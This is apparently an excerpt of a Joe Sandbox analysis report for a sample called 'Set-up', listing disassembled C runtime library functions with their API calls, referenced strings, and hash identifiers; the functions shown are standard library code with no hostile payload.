std::exception::exception.LIBCMT(6BC07580), ref: 6BB8F301
_CxxThrowException.MSVCR100(?,6BB6BDD8,6BC07580), ref: 6BB8F312
_errno.MSVCR100 ref: 6BB8F321
_errno.MSVCR100 ref: 6BB8F32E

Strings

bad allocation, xrefs: 6BB8F2E0

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errnostd::exception::exception$AllocateExceptionHeapThrow_callnewhatexitmalloc
String ID: bad allocation
API String ID: 903262172-2104205924
Opcode ID: 99154cb0b59ed6009591a82716f68f58311ea221241410986b03747919e4aa3f
Instruction ID: 06e1a486cb5e64fc0edb330672b342f087aae96a2fedb1b9e5113cb4453c5dee
Opcode Fuzzy Hash: 99154cb0b59ed6009591a82716f68f58311ea221241410986b03747919e4aa3f
Instruction Fuzzy Hash: DC018075901699AACB19DB76C88269D7BB4EF412C8F540499E820E6180FF798E01EBA0

Function 6BB60233 Relevance: 12.1, APIs: 8, Instructions: 60
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
__FF_MSGBANNER.LIBCMT ref: 6BB8F22F
__NMSG_WRITE.LIBCMT ref: 6BB8F236
_callnewh.MSVCR100(00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001), ref: 6BB8F255
_callnewh.MSVCR100(00000001,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BB8F278
_errno.MSVCR100(00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9), ref: 6BB8F27E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _callnewh$AllocateHeap_errno
String ID:
API String ID: 4160251224-0
Opcode ID: af838b61b91670ad9c713365cd85bbdd80e426fa3e66175bf958d86046ef5f5b
Instruction ID: 9ea92a192e9619e1a021fff4825dad19e8d71ba8dd4b7b91ffc9539332bd07cb
Opcode Fuzzy Hash: af838b61b91670ad9c713365cd85bbdd80e426fa3e66175bf958d86046ef5f5b
Instruction Fuzzy Hash: 9C017935248BC29AE6122E76DC81B2E3798DF96794F510575B5248D190EF7DCC408E71

Non-executed Functions

Function 6BB7457E Relevance: 99.1, APIs: 42, Strings: 14, Instructions: 1146COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getThisType.LIBCMT ref: 6BB746C4
DName::operator+.LIBCMT ref: 6BB7470A
DName::DName.LIBCMT ref: 6BB74746
DName::operator+.LIBCMT ref: 6BB7474D
DName::DName.LIBCMT ref: 6BB747D6
DName::operator+.LIBCMT ref: 6BB747DD
DName::DName.LIBCMT ref: 6BB751AA
DName::operator+.LIBCMT ref: 6BB751B1

Strings

protected: , xrefs: 6BB8E5CB
private: , xrefs: 6BB8E578
virtual , xrefs: 6BB8E50D
`local static destructor helper', xrefs: 6BB8E314
`adjustor{, xrefs: 6BB8E1B2
`template static data member constructor helper', xrefs: 6BB8E36A
[thunk]:, xrefs: 6BB8E659
extern "C" , xrefs: 6BB8E686
}' , xrefs: 6BB8DF02, 6BB8E1C8
static , xrefs: 6BB751A2
`vtordispex{, xrefs: 6BB8E0EE
public: , xrefs: 6BB8E61C
`template static data member destructor helper', xrefs: 6BB8E3BD
`vtordisp{, xrefs: 6BB8E17A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getThisType
String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
API String ID: 1425277612-3028518216
Opcode ID: 02262e26ff8a61a8508caf864c2602c42f51e2396ab6b490339f06af7dedd609
Instruction ID: 3f90fa265a66241a7374bb06a454bc6a93bbd83faf680b06a8b3c41c0e5df8f5
Opcode Fuzzy Hash: 02262e26ff8a61a8508caf864c2602c42f51e2396ab6b490339f06af7dedd609
Instruction Fuzzy Hash: 34828D72E602899BEF15DEA8D881BEDB7B5EF48345F14017AE521E7280EB3CD945CB10

Function 6BBAA3DD Relevance: 98.2, APIs: 38, Strings: 18, Instructions: 204
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA3F9
GetProcAddress.KERNEL32(00000000), ref: 6BBAA402
GetLastError.KERNEL32(?,?,?,?,6BB9BFE9), ref: 6BBAA408
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA420
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,6BB9BFE9), ref: 6BBAA42E
GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6BB9BFE9), ref: 6BBAA447
GetProcAddress.KERNEL32(00000000), ref: 6BBAA44A
GetLastError.KERNEL32(?,?,?,?,6BB9BFE9), ref: 6BBAA450
GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6BB9BFE9), ref: 6BBAA470
GetProcAddress.KERNEL32(00000000), ref: 6BBAA473
GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6BB9BFE9), ref: 6BBAA48D
GetProcAddress.KERNEL32(00000000), ref: 6BBAA490
GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6BB9BFE9), ref: 6BBAA4AA
GetProcAddress.KERNEL32(00000000), ref: 6BBAA4AD
GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6BB9BFE9), ref: 6BBAA4C7
GetProcAddress.KERNEL32(00000000), ref: 6BBAA4CA
GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6BB9BFE9), ref: 6BBAA4E4
GetProcAddress.KERNEL32(00000000), ref: 6BBAA4E7
GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6BB9BFE9), ref: 6BBAA505
GetProcAddress.KERNEL32(00000000), ref: 6BBAA508
GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6BB9BFE9), ref: 6BBAA526
GetProcAddress.KERNEL32(00000000), ref: 6BBAA529
GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6BB9BFE9), ref: 6BBAA547
GetProcAddress.KERNEL32(00000000), ref: 6BBAA54A
GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6BB9BFE9), ref: 6BBAA568
GetProcAddress.KERNEL32(00000000), ref: 6BBAA56B
GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6BB9BFE9), ref: 6BBAA589
GetProcAddress.KERNEL32(00000000), ref: 6BBAA58C
GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6BB9BFE9), ref: 6BBAA5AA
GetProcAddress.KERNEL32(00000000), ref: 6BBAA5AD
GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6BB9BFE9), ref: 6BBAA5CB
GetProcAddress.KERNEL32(00000000), ref: 6BBAA5CE
GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6BB9BFE9), ref: 6BBAA5EC
GetProcAddress.KERNEL32(00000000), ref: 6BBAA5EF
GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6BB9BFE9), ref: 6BBAA60D
GetProcAddress.KERNEL32(00000000), ref: 6BBAA610
GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6BB9BFE9), ref: 6BBAA62E
GetProcAddress.KERNEL32(00000000), ref: 6BBAA631

Strings

GetUmsCompletionListEvent, xrefs: 6BBAA462
UmsThreadYield, xrefs: 6BBAA49C
DeleteUmsThreadContext, xrefs: 6BBAA55A
kernel32.dll, xrefs: 6BBAA3F3, 6BBAA3F8, 6BBAA440, 6BBAA469, 6BBAA486, 6BBAA4A3, 6BBAA4C0, 6BBAA4DD, 6BBAA4FE, 6BBAA51F, 6BBAA540, 6BBAA561, 6BBAA582, 6BBAA5A3, 6BBAA5C4, 6BBAA5E5, 6BBAA606, 6BBAA627
DequeueUmsCompletionListItems, xrefs: 6BBAA439
UpdateProcThreadAttribute, xrefs: 6BBAA5FF
DeleteProcThreadAttributeList, xrefs: 6BBAA620
CreateUmsCompletionList, xrefs: 6BBAA3EE
InitializeProcThreadAttributeList, xrefs: 6BBAA5DE
CreateUmsThreadContext, xrefs: 6BBAA57B
ExecuteUmsThread, xrefs: 6BBAA47F
CreateRemoteThreadEx, xrefs: 6BBAA5BD
GetCurrentUmsThread, xrefs: 6BBAA4D6
SetUmsThreadInformation, xrefs: 6BBAA539
GetNextUmsListItem, xrefs: 6BBAA4F7
QueryUmsThreadInformation, xrefs: 6BBAA518
DeleteUmsCompletionList, xrefs: 6BBAA4B9
EnterUmsSchedulingMode, xrefs: 6BBAA59C

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
API String ID: 1483908321-2643937717
Opcode ID: 83541c4beb39d2775b9aafd13d83a1ecc309512afd5109a8ec9805731a819a5c
Instruction ID: b28317abf00fb86549272b847fd1654502bbf231421f431e57a0d18b4ba4c531
Opcode Fuzzy Hash: 83541c4beb39d2775b9aafd13d83a1ecc309512afd5109a8ec9805731a819a5c
Instruction Fuzzy Hash: EC5125B5E082966A9F58AF758D59D3B3EFDFA85680306056FA426C3144EE3ED900CF70

Function 6BB67270 Relevance: 86.2, APIs: 18, Strings: 31, Instructions: 416
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_getptd.MSVCR100(00000083,00000001,000000BC,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB67278
GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB672CC
IsValidCodePage.KERNEL32(00000000,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6731E
IsValidLocale.KERNEL32(?,00000001,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB67331
GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB6737B
GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6BB6738F
_itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6BB673A0
_TranslateName.LIBCMT ref: 6BB917C8

Strings

kENU, xrefs: 6BB918A1
kESV, xrefs: 6BB91A6A
kSVF, xrefs: 6BB91A72
kESC, xrefs: 6BB919FA
kGBR, xrefs: 6BB91B3A
kESO, xrefs: 6BB919F2
kKOR, xrefs: 6BB91B22
kUSA, xrefs: 6BB91B42
kNLB, xrefs: 6BB918FA
kENU, xrefs: 6BB91A8A
kENB, xrefs: 6BB91921
kZAF, xrefs: 6BB91B0A
kENA, xrefs: 6BB91909
kCHT, xrefs: 6BB918F2
kENI, xrefs: 6BB919AA
kSVK, xrefs: 6BB91B02
kENC, xrefs: 6BB918B9
kTTO, xrefs: 6BB91B2A
kENU, xrefs: 6BB91902
kNLB, xrefs: 6BB918B1
kENA, xrefs: 6BB918A9
kFRC, xrefs: 6BB91972
kENU, xrefs: 6BB91892
kFRB, xrefs: 6BB9196A
kESU, xrefs: 6BB91A5A
Norwegian-Nynorsk, xrefs: 6BB91867
kENU, xrefs: 6BB91899
kDES, xrefs: 6BB91A7A
kUSA, xrefs: 6BB91B4A
kENL, xrefs: 6BB91911
kENC, xrefs: 6BB9191A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultNamePageTranslateUser_getptd_itoa_s
String ID: Norwegian-Nynorsk$kCHT$kDES$kENA$kENA$kENB$kENC$kENC$kENI$kENL$kENU$kENU$kENU$kENU$kENU$kESC$kESO$kESU$kESV$kFRB$kFRC$kGBR$kKOR$kNLB$kNLB$kSVF$kSVK$kTTO$kUSA$kUSA$kZAF
API String ID: 3958957854-1521886187
Opcode ID: f678da44c95a2cedfca429e82b3d51cbcd4e32932695cfabb67076ee5246cc4d
Instruction ID: e40e8559f912b81dccbca0fbc1e502a9619d25e0212857dc48f19691d791b0f1
Opcode Fuzzy Hash: f678da44c95a2cedfca429e82b3d51cbcd4e32932695cfabb67076ee5246cc4d
Instruction Fuzzy Hash: 7CE1587190CAE29FD7129F358CA4AA57F68AFA3384B0904DECA404B1D3E668D946C752

Function 6BB9BE38 Relevance: 61.6, APIs: 31, Strings: 4, Instructions: 336
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 6BB9BE5C
_memset.LIBCMT(?,00000000,00000114), ref: 6BB9BE85
GetVersionExW.KERNEL32(?), ref: 6BB9BE96
GetLastError.KERNEL32 ref: 6BB9C07B
GetLastError.KERNEL32 ref: 6BB9C082
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C097
malloc.MSVCR100 ref: 6BB9C0B0
std::exception::exception.LIBCMT ref: 6BB9C0D2
GetLastError.KERNEL32 ref: 6BB9C0F5
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C10A
free.MSVCR100(?), ref: 6BB9C178
GetLastError.KERNEL32 ref: 6BB9C1A4
GetLastError.KERNEL32 ref: 6BB9C1AB
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C1BD
malloc.MSVCR100 ref: 6BB9C1D6
std::exception::exception.LIBCMT ref: 6BB9C1F8
GetLastError.KERNEL32 ref: 6BB9C21E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C230
free.MSVCR100(?), ref: 6BB9C2BB
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9BEAA

Part of subcall function 6BB980CA: std::exception::exception.LIBCMT(6BB9C2E6,00000114,?), ref: 6BB980DE

_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BEB9
GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx), ref: 6BB9BEFE
GetProcAddress.KERNEL32(00000000), ref: 6BB9BF05
GetLastError.KERNEL32 ref: 6BB9BF17
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BF30
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9BF4D
GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,?,6BBFFEB4,00000000), ref: 6BB9C02D
GetProcAddress.KERNEL32(00000000), ref: 6BB9C034
GetLastError.KERNEL32 ref: 6BB9C040
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C059
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9C2E1

Strings

GetLogicalProcessorInformationEx, xrefs: 6BB9BEF4
GetLogicalProcessorInformation, xrefs: 6BB9C023
kernel32.dll, xrefs: 6BB9BEF9, 6BB9C028
bad allocation, xrefs: 6BB9C0CA, 6BB9C1F0

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error$Concurrency::unsupported_os::unsupported_osstd::exception::exception$AddressHandleModuleProcfreemalloc$ExceptionInfoSystemThrowVersion_memset
String ID: GetLogicalProcessorInformation$GetLogicalProcessorInformationEx$bad allocation$kernel32.dll
API String ID: 1988720266-1310109495
Opcode ID: 1f16ea724d838683d112c2e9af6de37977242ff13d071de2b9e595929cb6aded
Instruction ID: 64f03b279837099059cbf18caad96cab1bf2ab195c57c6f041f11bb1a5368312
Opcode Fuzzy Hash: 1f16ea724d838683d112c2e9af6de37977242ff13d071de2b9e595929cb6aded
Instruction Fuzzy Hash: A2C1CF716086C19FD714EF69E881A5A77F8EB8B750F11487EE044D2140D73ECB49EBA2

Function 6BB781A1 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcspbrk.LIBCMT(?,6BB77D1C), ref: 6BB781E3
_getdrive.MSVCR100 ref: 6BB781FD

Part of subcall function 6BB780BC: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB780EF

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6BB78214
_wcspbrk.LIBCMT(?,./\), ref: 6BB78235

Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB7816A
Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB78171
Part of subcall function 6BB78163: _wfullpath.MSVCR100(?,?,?), ref: 6BB78182
Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB7818C

_wcslen.LIBCMT(00000000), ref: 6BB78263
_errno.MSVCR100 ref: 6BB7828B
__doserrno.MSVCR100 ref: 6BB78295
__doserrno.MSVCR100 ref: 6BB87CB4
_errno.MSVCR100 ref: 6BB87CBB
_invalid_parameter_noinfo.MSVCR100 ref: 6BB87CC6
towlower.MSVCR100(00000000), ref: 6BB87CE3
GetDriveTypeW.KERNEL32(00000000), ref: 6BB87CF5
free.MSVCR100(?), ref: 6BB87D12
___loctotime64_t.LIBCMT ref: 6BB87D45
free.MSVCR100(?), ref: 6BB87D72

Part of subcall function 6BB7813D: _wcslen.LIBCMT(00000000,6BB78277), ref: 6BB78140

__wsopen_s.LIBCMT(000000FF,?,00000000,00000040,00000000), ref: 6BB87DA8
__fstat64i32.LIBCMT(000000FF,?), ref: 6BB87DCC
_close.MSVCR100(000000FF,000000FF,?), ref: 6BB87DD9
FindClose.KERNEL32(?), ref: 6BB87FAA
___wdtoxmode.LIBCMT ref: 6BB87FB7
GetLastError.KERNEL32 ref: 6BB88009
__dosmaperr.LIBCMT(00000000), ref: 6BB88010
FindClose.KERNEL32(?), ref: 6BB8801C

Strings

./\, xrefs: 6BB78229

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$Find$Close__doserrno_wcslen_wcspbrkfree$CurrentDirectoryDriveErrorFileFirstLastType___loctotime64_t___wdtoxmode__dosmaperr__fstat64i32__wsopen_s_close_getdrive_invalid_parameter_noinfo_wfullpathtowlower
String ID: ./\
API String ID: 2703246364-3176372042
Opcode ID: 86c617146b37c7425ffa69d38de53ba604f1c838b00cb3a628c9824009101d23
Instruction ID: 132b4d04f55bfac546b7a5c9274a811957013071c4a06bf99c8dee5dca80e061
Opcode Fuzzy Hash: 86c617146b37c7425ffa69d38de53ba604f1c838b00cb3a628c9824009101d23
Instruction Fuzzy Hash: 1DC154B19045A9EEDB609F76CC44AA9B7B8FF09315F0401EAE65CE3140E7789E80CF65

Function 6BB762FC Relevance: 40.8, APIs: 27, Instructions: 271stringtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.MSVCR100(00000007,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB7631E

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

__tzname.MSVCR100(6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76327
_get_timezone.MSVCR100(?,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76333
_get_daylight.MSVCR100(6BB7693D,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76345
_get_dstbias.MSVCR100(00000008,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76357
___lc_codepage_func.MSVCR100(6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76365

Part of subcall function 6BB72214: _strlen.LIBCMT(00000000), ref: 6BB72232
Part of subcall function 6BB72214: _strlen.LIBCMT(00000000), ref: 6BB72241
Part of subcall function 6BB72214: __fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB7225D

GetTimeZoneInformation.KERNEL32(6BC04DF0,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB763AC
WideCharToMultiByte.KERNEL32(00000000,00000000,6BC04DF4,00000000,?,0000003F,00000000,?), ref: 6BB7642A
WideCharToMultiByte.KERNEL32(000000FF,00000000,6BC04E48,000000FF,?,0000003F,00000000,?), ref: 6BB7645D
__timezone.MSVCR100 ref: 6BB76483
__daylight.MSVCR100 ref: 6BB7648D
__dstbias.MSVCR100 ref: 6BB76497
strcmp.MSVCR100(00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899C9
free.MSVCR100(00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899E2
_strlen.LIBCMT(00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899E9
_malloc_crt.MSVCR100(00000001,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899F0
_strlen.LIBCMT(00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A06
strcpy_s.MSVCR100(00000001,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A14
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A29
free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A2F
strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6BB89A4A
atol.MSVCR100(-00000003), ref: 6BB89A67

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__fassign__invoke_watson__timezone__tzname_get_daylight_get_dstbias_get_timezone_lock_malloc_crtatolstrcmpstrcpy_sstrncpy_s
String ID:
API String ID: 3174396702-0
Opcode ID: ffd60283073ba18985affda409542d88f88e6d1c28ae89f98a9a033e555c3e44
Instruction ID: ec4b9a8d4998f608dddc025c1be430874f5ebbea288f22d6ac27984bcc41f6b8
Opcode Fuzzy Hash: ffd60283073ba18985affda409542d88f88e6d1c28ae89f98a9a033e555c3e44
Instruction Fuzzy Hash: DD91E271C042859FDF10AFB9C88199DBBF9FF1A314B60107AE1A1A7291E77D8E41CB64

Function 6BB6767A Relevance: 18.2, APIs: 12, Instructions: 160stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6BB67435
free.MSVCR100(?,?,?,00000000), ref: 6BB67456
_calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB6763F
strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6BB67659
GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
_calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
free.MSVCR100(00000000), ref: 6BB906E1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

